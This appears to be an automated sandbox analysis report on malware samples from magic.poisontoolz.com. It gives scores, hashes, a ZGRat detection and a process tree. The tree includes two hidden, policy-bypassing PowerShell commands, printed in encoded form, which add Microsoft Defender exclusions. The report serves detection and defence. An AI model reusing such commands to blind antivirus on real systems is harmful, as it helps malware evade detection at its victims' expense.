Overview

Static: score 10
Score | Sample              | Platform
3     | magic.pois...lk.dat | windows10-2004-x64
3     | magic.pois...ed.exe | windows10-2004-x64
10    | magic.pois...pt.exe | windows10-2004-x64
10    | magic.pois...cs.hta | windows10-2004-x64
10    | magic.pois...nt.pdf | windows10-2004-x64
1     | magic.pois...zg.wav | windows10-2004-x64
6     | magic.pois...pt.exe | windows10-2004-x64
10    | magic.pois...pt.exe | windows10-2004-x64
10    | magic.pois...es.hta | windows10-2004-x64
10    | magic.pois...im.vdf | windows10-2004-x64
3     | magic.pois...ck.wav | windows10-2004-x64
1     | magic.pois...ff.dat | windows10-2004-x64
3     | magic.pois...IB.pdf | windows10-2004-x64
1     | magic.pois...pt.exe | windows10-2004-x64
10    | magic.pois...ty.wav | windows10-2004-x64
1     | magic.pois...ye.wav | windows10-2004-x64
6     | magic.pois...er.exe | windows10-2004-x64
10    | magic.pois...vw.mp4 | windows10-2004-x64
6     | magic.pois...op.mp4 | windows10-2004-x64
6     | magic.pois...ed.hta | windows10-2004-x64
10    | magic.pois...ng.exe | windows10-2004-x64
10    | magic.pois...wn.png | windows10-2004-x64
3     | magic.pois...ox.hta | windows10-2004-x64
10    | magic.pois...xw.exe | windows10-2004-x64
10    | magic.pois...xw.hta | windows10-2004-x64
10    | magic.pois...pt.exe | windows10-2004-x64
Analysis (score 10)
- max time kernel: 2s
- max time network: 88s
- platform: windows10-2004_x64
- resource: win10v2004-20231215-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 19-01-2024 20:19
Static task: static1

Behavioral tasks:

Task         | Sample                                   | Resource
behavioral1  | magic.poisontoolz.com/Avjteuhlk.dat      | win10v2004-20231215-en
behavioral2  | magic.poisontoolz.com/Binded.exe         | win10v2004-20231215-en
behavioral3  | magic.poisontoolz.com/Buildcrypt.exe     | win10v2004-20231215-en
behavioral4  | magic.poisontoolz.com/Docs.hta           | win10v2004-20231215-en
behavioral5  | magic.poisontoolz.com/Document.pdf       | win10v2004-20231215-en
behavioral6  | magic.poisontoolz.com/Evllmzg.wav        | win10v2004-20231215-en
behavioral7  | magic.poisontoolz.com/File1crypt.exe     | win10v2004-20231215-en
behavioral8  | magic.poisontoolz.com/File2crypt.exe     | win10v2004-20231215-en
behavioral9  | magic.poisontoolz.com/Files.hta          | win10v2004-20231215-en
behavioral10 | magic.poisontoolz.com/Jafxaspdhim.vdf    | win10v2004-20231215-en
behavioral11 | magic.poisontoolz.com/Otcck.wav          | win10v2004-20231222-en
behavioral12 | magic.poisontoolz.com/Pphucxdmff.dat     | win10v2004-20231222-en
behavioral13 | magic.poisontoolz.com/RIB.pdf            | win10v2004-20231215-en
behavioral14 | magic.poisontoolz.com/RagCrypt.exe       | win10v2004-20231222-en
behavioral15 | magic.poisontoolz.com/Spaufgty.wav       | win10v2004-20231222-en
behavioral16 | magic.poisontoolz.com/Utsxokye.wav       | win10v2004-20231215-en
behavioral17 | magic.poisontoolz.com/Walter.exe         | win10v2004-20231215-en
behavioral18 | magic.poisontoolz.com/Wjwxkhbvw.mp4      | win10v2004-20231215-en
behavioral19 | magic.poisontoolz.com/Wlkubkwdmop.mp4    | win10v2004-20231215-en
behavioral20 | magic.poisontoolz.com/binded.hta         | win10v2004-20231215-en
behavioral21 | magic.poisontoolz.com/building.exe       | win10v2004-20231215-en
behavioral22 | magic.poisontoolz.com/down.png           | win10v2004-20231215-en
behavioral23 | magic.poisontoolz.com/fox.hta            | win10v2004-20231215-en
behavioral24 | magic.poisontoolz.com/xw.exe             | win10v2004-20231215-en
behavioral25 | magic.poisontoolz.com/xw.hta             | win10v2004-20231215-en
General
- Target: magic.poisontoolz.com/Binded.exe
- Size: 5.4MB
- MD5: 8f505e8ec6a2129264b6609d96e68962
- SHA1: a4f8e2102645ad87b37c4de7fa45779d3bb70f18
- SHA256: 59e7180a2a869453fb54d13f04b4eda1a5153659378501fa31b18f862576f800
- SHA512: 49f4b191e7e7edfb29ebe9c40cc9dc1f57824aff6b166815d9a0bd46e3e883bbf74bccee95469116a522dc850ead3813fb2977b485ead64d37c680e9acb33396
- SSDEEP: 49152:tl+wZnx28ufF6eE39oRGIOVgdDll+wZnx28uf36eE39oRGIOVgdDp:
Malware Config
Signatures
- Detect ZGRat V1 (32 IoCs)
- Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow | IoC
  15   | ip-api.com
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Processes
- C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe (PID 1200)
  Command line: "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Binded.exe"
  - C:\Users\Admin\AppData\Local\Temp\blbrok.exe (PID 3892)
    Command line: "C:\Users\Admin\AppData\Local\Temp\blbrok.exe"
  - C:\Users\Admin\AppData\Local\Temp\rock.exe (PID 2576)
    Command line: "C:\Users\Admin\AppData\Local\Temp\rock.exe"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2168)
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
  (The UTF-16LE base64 argument decodes to Add-MpPreference calls that add Microsoft Defender exclusions for the path C:\Users\Admin\AppData\Local and the process TypeId.exe; a Defender exclusion being added from a hidden, bypass-policy PowerShell is a strong detection signal.)
- C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe (PID 3984)
  Command line: C:\Users\Admin\AppData\Local\Hash\mdvhj\TypeId.exe
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe (PID 2960)
    Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1148)
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABUAHkAcABlAEkAZAAuAGUAeABlADsA
  (Same encoded Add-MpPreference exclusion command as PID 2168.)
- C:\Users\Admin\AppData\Local\Temp\nxryyws.exe (PID 2576)
  Command line: C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
  - C:\Users\Admin\AppData\Local\Temp\nxryyws.exe (PID 3560)
    Command line: C:\Users\Admin\AppData\Local\Temp\nxryyws.exe
Downloads